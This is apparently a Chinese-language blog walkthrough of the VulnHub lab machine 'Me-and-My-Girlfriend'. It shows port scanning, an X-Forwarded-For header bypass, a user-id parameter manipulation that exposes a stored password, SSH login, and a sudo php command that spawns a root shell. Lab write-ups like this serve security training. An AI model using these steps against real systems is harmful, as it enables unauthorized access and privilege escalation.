Vulnhub Me-and-My-Girlfriend

一、信息收集

1.nmap 端口扫描

发现开发了22、80

Vulnhub Me-and-My-Girlfriend_第1张图片

2.访问ip,右击查看源代码

发现需要利用X-Forwarded-For

插件:X-Forwarded-For Header

Vulnhub Me-and-My-Girlfriend_第2张图片

Vulnhub Me-and-My-Girlfriend_第3张图片

挂上代理后:

出现以下页面:

先注册一个账户,然后再登录

发现有参数进行传参

Vulnhub Me-and-My-Girlfriend_第4张图片

发现传参,参数为5的时候,出现主角alice

Vulnhub Me-and-My-Girlfriend_第5张图片

查看密码:把type删掉

发现密码是:4lic3

Vulnhub Me-and-My-Girlfriend_第6张图片

Vulnhub Me-and-My-Girlfriend_第7张图片

二、漏洞利用

1.ssh连接

账号:alice
密码:4lic3

Vulnhub Me-and-My-Girlfriend_第8张图片

2.flag1

alice@gfriEND:~$ cd .my_secret/

alice@gfriEND:~/.my_secret$ ls
flag1.txt  my_notes.txt

alice@gfriEND:~/.my_secret$ cat flag1.txt

alice@gfriEND:~/.my_secret$ cat my_notes.txt

Vulnhub Me-and-My-Girlfriend_第9张图片

三、php回调bash提权

提权网站:

https://gtfobins.github.io/

sudo -l 查看哪些可以sudo提权

Vulnhub Me-and-My-Girlfriend_第10张图片

可以看到有个php有root权限可以利用

Vulnhub Me-and-My-Girlfriend_第11张图片

3.flag2


sudo php -r "system('/bin/sh');"

python3 -c 'import pty; pty.spawn("/bin/bash")'  #python交互式shell

Vulnhub Me-and-My-Girlfriend_第12张图片

你可能感兴趣的:(web,VulnHub,安全,网络,VulnHub)